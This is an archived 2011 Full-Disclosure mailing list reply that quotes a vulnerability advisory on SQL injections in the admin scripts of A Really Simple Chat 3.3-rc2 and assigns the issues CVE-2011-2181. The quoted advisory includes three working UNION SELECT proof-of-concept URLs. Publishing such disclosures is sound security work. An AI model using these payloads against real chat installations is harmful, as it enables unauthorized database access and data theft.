[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] HTB22999: Multiple SQL Injections in A Really Simple Chat (ARSC)

To: advisory@xxxxxxxxxxx
Subject: Re: [Full-disclosure] HTB22999: Multiple SQL Injections in A Really Simple Chat (ARSC)
From: Henri Salo <henri@xxxxxxx>
Date: Fri, 3 Jun 2011 10:45:34 +0300

On Wed, Jun 01, 2011 at 02:10:13PM +0200, advisory@xxxxxxxxxxx wrote:
> Vulnerability ID: HTB22999
> Reference: 
> http://www.htbridge.ch/advisory/multiple_sql_injections_in_a_really_simple_chat_arsc.html
> Product: A Really Simple Chat (ARSC)
> Vendor: http://www.reallysimplechat.org/ ( http://www.reallysimplechat.org/ ) 
> Vulnerable Version: 3.3-rc2
> Vendor Notification: 12 May 2011 
> Vulnerability Type: SQL Injection
> Risk level: High 
> Credit: High-Tech Bridge SA Security Research Lab ( 
> http://www.htbridge.ch/advisory/ ) 
> 
> Vulnerability Details:
> The vulnerability exists due to failure in the "/base/admin/edit_user.php" 
> script to properly sanitize user-supplied input in "user" variable.
> Attacker can alter queries to the application SQL database, execute arbitrary 
> queries to the database, compromise the application, access or modify 
> sensitive data, or exploit various vulnerabilities in the underlying SQL 
> database.
> The following PoC is available:
> 
> http://[host]/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
> 
> The vulnerability exists due to failure in the "/base/admin/edit_layout.php" 
> script to properly sanitize user-supplied input in "arsc_layout_id" variable.
> The following PoC is available:
> 
> http://[host]/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
> 
> The vulnerability exists due to failure in the "/base/admin/edit_room.php" 
> script to properly sanitize user-supplied input in "arsc_room" variable.
> The following PoC is available:
> 
> http://[host]/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202

These issues can be refered as: CVE-2011-2181. Could you please update www-site 
advisory?

Best regards,
Henri Salo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] VMSA-2011-0009 VMware hosted product updates, ESX patches and VI , Client update resolve multiple security issues
Next by Date: Re: [Full-disclosure] HTB22997: XSS in A Really Simple Chat (ARSC)
Previous by thread: [Full-disclosure] VMSA-2011-0009 VMware hosted product updates, ESX patches and VI , Client update resolve multiple security issues
Next by thread: Re: [Full-disclosure] HTB22997: XSS in A Really Simple Chat (ARSC)
Index(es):
- Date
- Thread